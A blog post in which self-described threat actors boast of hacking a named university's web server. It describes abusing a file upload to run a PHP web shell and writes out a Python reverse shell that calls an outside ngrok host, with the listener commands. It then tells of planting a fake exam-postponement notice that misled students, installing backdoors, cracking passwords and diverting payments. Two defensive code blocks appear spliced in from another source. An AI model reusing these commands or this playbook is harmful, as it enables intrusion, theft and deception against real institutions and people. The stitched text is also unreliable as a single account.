In this article, I will be writing about a shady institute, Harare Institute of Technology, with beyond horrible security practices. I think that the people at @HIT will equally appreciate my reporting on this. Let us prove that I was indeed able to hack into the HIT web server real quick.
The above screenshots clearly show we were able to access their MySQL database. Still have doubts and want some more proof? Below is a screenshot of HIT's root web directory:
Enough of the proof, I will not be disclosing any sensitive information on this server.
In short, we OWN them. We have all their data.
TL;DR How it happened
So now you might be curious to know how this happened. Well, stay with me and I will explain how I performed all the HACKS. Before we commence, get yourself a cup of coffee☕. Got your cup of coffee☕? Now let's get started.
The HIT website has this cool feature that allows the procurement team to post Requests for Quotation (RFQs). The staff log in to an admin panel with a username and password, secure enough 😂. They then go on to post an RFQ with a title, a due date, and a document that has more details about the RFQ, and this is where it gets interesting. But first, let's bypass the login.
A Login Form Is Secure, Right? WRONG!
First I tried a random username and password and it threw an authentication error, still secure enough. Next I moved on to find out how the form was being submitted and whether I could exploit it somehow.
Now back to our RFQ documents. First I created my own RFQ entry and uploaded a PDF file, and it worked just fine. So I tried uploading a different kind of file instead: a PHP script with a simple echo inside. To my surprise (well, not really a surprise) the file was uploaded and I was able to run it. I got remote code execution!
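The root cause here is an upload handler that trusts the client's filename and stores it under the web root. As an added example (not code from the article or from HIT's site), this is how that RFQ document upload should be validated server-side; the `UPLOAD_DIR` path and the PDF-only policy are assumptions:

```python
import os
import secrets

# Hardened handling of the RFQ document upload described above (added
# example; not the institute's code). Assumptions: only PDFs are accepted and
# files are stored under UPLOAD_DIR, a hypothetical directory outside the
# web root that the web server never executes scripts from.
UPLOAD_DIR = "/var/app/rfq_uploads"
ALLOWED_EXT = {".pdf"}          # allowlist: '.php', '.phtml' etc. never pass
PDF_MAGIC = b"%PDF-"


def validate_upload(filename: str, data: bytes) -> str:
    """Return a server-chosen storage name for an acceptable upload.

    Raises ValueError for anything that could turn into code execution:
    a disallowed or doubled extension, or content that is not a PDF.
    """
    base = os.path.basename(filename)          # drop any client-supplied path
    stem, ext = os.path.splitext(base)
    ext = ext.lower()                          # 'shell.PHP' is still PHP
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    if "." in stem:                            # 'shell.php.pdf' style names
        raise ValueError("multiple extensions not allowed")
    if not data.startswith(PDF_MAGIC):         # check content, not just name
        raise ValueError("content is not a PDF")
    # Never reuse the client's filename: a random name means nothing the
    # uploader controls reaches the filesystem or a URL.
    return secrets.token_hex(16) + ext


def is_upload_allowed(filename: str, data: bytes) -> bool:
    """Boolean wrapper around validate_upload for callers that need a verdict."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False


def store_upload(filename: str, data: bytes, upload_dir: str = UPLOAD_DIR) -> str:
    """Validate, then write the file under upload_dir with the safe name."""
    safe_name = validate_upload(filename, data)
    os.makedirs(upload_dir, exist_ok=True)
    path = os.path.join(upload_dir, safe_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path
```

Serving the stored file back through a download handler that sets a fixed `Content-Type` and `Content-Disposition: attachment` keeps the browser and the web server from ever treating it as a script.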
Getting A Reverse Shell
Now it was time to get the infamous reverse shell. I uploaded the PHP reverse shell from pentest monkey but I couldn't get a shell; the webmaster did a very good job😎 of making sure `PHP` cannot run any shell commands. Next, I used msfvenom to generate a raw PHP reverse shell, but that too was a bust.
After hours of scouring the internet I came across this web shell class that claimed to bypass any restrictions on PHP <= 7.4. I uploaded that one and got a web shell, but that wasn't useful on its own.
So what I did next was to test if I was able to run any system commands using the `web shell`. The first thing I did was to list the contents of the webroot directory. Voila! I had OS command injection.
Again this wasn't enough. For me to get a reverse shell, I needed either python or PHP installed on the system, so I went on and checked whether python was available by injecting this command:
```shell
$ which python
```
The above snippet clearly shows that python was indeed installed on the system. Now, what next?
Tunneling Works All The Time
Two gems💎 already found (`python` and `OS command injection`), now I was left with one last gem to solve the mystery. I needed some sort of way to tunnel a connection from a public URL to my application running locally, so for this ngrok was the last gem💎 I needed. Honestly, it sounds pretty cool, right? So I fired up ngrok and opened my local `TCP port 443`. Well, you know what, why don't I show you?
```shell
$ ngrok tcp 443
```
You can see I have a forwarded port and tunnel set up from port 443 (TCP) on my localhost, now publicly available at
Now anyone on the Internet can connect back to me.
Gaining Remote Control
After this, I set up a local netcat listener to listen for the incoming connection and carefully crafted a python reverse shell:
Netcat listener listening on port 443 on my localhost:
```shell
$ nc -nlvp 443
```
netcat hungrily waiting for an incoming connection
Carefully crafted python reverse shell with my ngrok tunnel's public host and port:
```shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("4.tcp.ngrok.io", 11003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Popping The Shell
I then went on injecting the above python reverse shell on the vulnerable command injection endpoint, in other words the `web shell` I uploaded, and voila!
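Every step of this chain leaves a trace in the web server's access log: a script extension being requested from the directory that is supposed to hold PDFs. As an added example (not from the article), this scanner flags those requests over a few constructed combined-format log lines; the `UPLOAD_PREFIXES` paths are assumptions:

```python
import re
from typing import Dict, List, Optional

# Added example (not from the article): flag requests that execute scripts out
# of an upload directory, which is exactly how the uploaded web shell above
# was reached. UPLOAD_PREFIXES are hypothetical paths; the log lines are
# constructed samples in Apache/nginx "combined" format.
UPLOAD_PREFIXES = ("/uploads/", "/rfq/docs/")
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2021:14:02:11 +0200] "POST /admin/rfq/add.php HTTP/1.1" 302 0
203.0.113.7 - - [10/Nov/2021:14:02:40 +0200] "GET /uploads/rfq/test.php HTTP/1.1" 200 12
198.51.100.3 - - [10/Nov/2021:14:03:01 +0200] "GET /uploads/rfq/tender_2021.pdf HTTP/1.1" 200 48211
203.0.113.7 - - [10/Nov/2021:14:05:27 +0200] "GET /uploads/rfq/ws.php?cmd=ls HTTP/1.1" 200 940
203.0.113.7 - - [10/Nov/2021:14:06:02 +0200] "GET /uploads/rfq/old.PHTML HTTP/1.1" 404 196
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None for lines that don't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_upload_script_hit(entry: Dict[str, str]) -> bool:
    """True if the request targets a script file under an upload directory."""
    path = entry["target"].split("?", 1)[0].lower()   # drop query string
    return path.startswith(UPLOAD_PREFIXES) and path.endswith(SCRIPT_EXTS)


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Return the suspicious entries; status 200 means the script actually ran."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_upload_script_hit(entry):
            entry["executed"] = "yes" if entry["status"] == "200" else "no"
            hits.append(entry)
    return hits
```

A 404 hit is still worth an alert: it shows someone probing for a shell that was removed or never landed. The same check belongs in the server config as a deny rule for script handlers under the upload path, so that the log entry is a 403 rather than a 200.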
Upgrade My Dumb Shell to a Fully Interactive Shell
The shell I first got was a dumb shell. If you are a Linux user you probably know what a dumb shell is.
Dumb shells are limited, lacking the full power and functionality of a proper terminal. Certain things don't work in these environments, and they can be troublesome to work with. Luckily, with a few commands, I was able to upgrade to a fully interactive shell with all the bells and whistles.
```shell
python -c "import pty; pty.spawn('/bin/bash')"
```
If you want to know more about the drawbacks a `dumb shell` has, check out this [article](https://null-byte.wonderhowto.com/how-to/upgrade-dumb-shell-fully-interactive-shell-for-more-flexibility-0197224/).
Let’s try out something interesting
Okay, I know what you're thinking: we get it, you hacked the web server, so what? Well, unfortunately escalation to root was a bust, but with time I'll figure it out. So I thought, what can I do with this? Around that time there was the FBI hack by Pompompurin, which sent kinda scary emails to users:
So I thought, why don't I try something like that?
During this time, the institute was scheduled for exams in 3 days. There was speculation that exams might be postponed. There was an opportunity to try something here! Time to put my Photoshop skills to the test. The HIT website has yet another awesome feature that allows the administration to post notices to students and other stakeholders. I took an old exams notice, rescheduled exams a month ahead and modified the HTML code to display my pwned notice. For the next couple of days there was chaos: no one could tell what was genuine and what wasn't. Some students even decided to leave the campus after hearing the great news. I suspect even the lecturers didn't come to work the following day. In response to this, the institute sent text messages to students reassuring them that exams would continue as scheduled. And unfortunately, they fixed the vulnerability.
This wasn’t our end
Yes, the HIT guys managed to fix it by removing write access to the folder where notices were kept. They also did a great job of fixing the login form bypass vulnerability. But little did they know that by fixing vulnerabilities they're just creating new puzzles for us to solve, which makes our playground more interesting and fascinating. So this didn't stop us from continuing to explore other attack vectors.
Bypass The Login Form Again!
I mean, who puts `<script>` tags before even opening the HTML5 doctype declaration? I figured there had to be some PHP code checking the credentials at the very beginning of the file, so I tried to intercept the response to the restricted page and, as I suspected,
Edit & Delete Records
This allowed me to inject another PHP backdoor and get another reverse shell.
Back To Our Reverse Shell
Now that I had my PHP backdoor uploaded again, it was time to do some deep internal enumeration. I had to hunt for that "little thing", as "the devil is in the detail".
After hours of enumerating I found a lot of juicy stuff, including confidential information and users (for different services), clear-text passwords, passwords hashed with weak MD5 which I was able to crack within a matter of seconds, sensitive files and databases, configuration files, and the list goes on forever.
Login to MySQL
In the enumeration process I was able to get hold of the `MySQL` user and password, so I tried to log in, and I'm in:
I tried viewing a few database records and, to my surprise, the users we created were there.
Organizations in Zimbabwe don't take information security seriously. This incident shows that even the slightest hack can have serious consequences. To illustrate, let's take a look at what I could have done instead of a prank. I love the cool features this website offers; online payments is my favorite. Since I could modify the HTML code, I could just replace the Paynow merchant configuration with my own, and each time a payment is made it goes to my account, and this could go unnoticed for at least a month. They would simply assume the money is 'hanging'; it does that sometimes. As of now, tuition is ZWL 42 148. On average, 2 students use Paynow a day, that's ZWL 84 249 per day. In 30 days that's ZWL 2 528 880! Using the current interbank exchange rate that's US $21 990 just lost, and I didn't even need root access! Apart from this, the server has a lot of sensitive information, which includes people who applied for jobs at the institute and student details that can be used for malicious activities. In short, there are a lot of malicious things I could have done, like spreading ransomware on their network.
Thanks for reading! More blog posts coming soon from your favorite threat actors.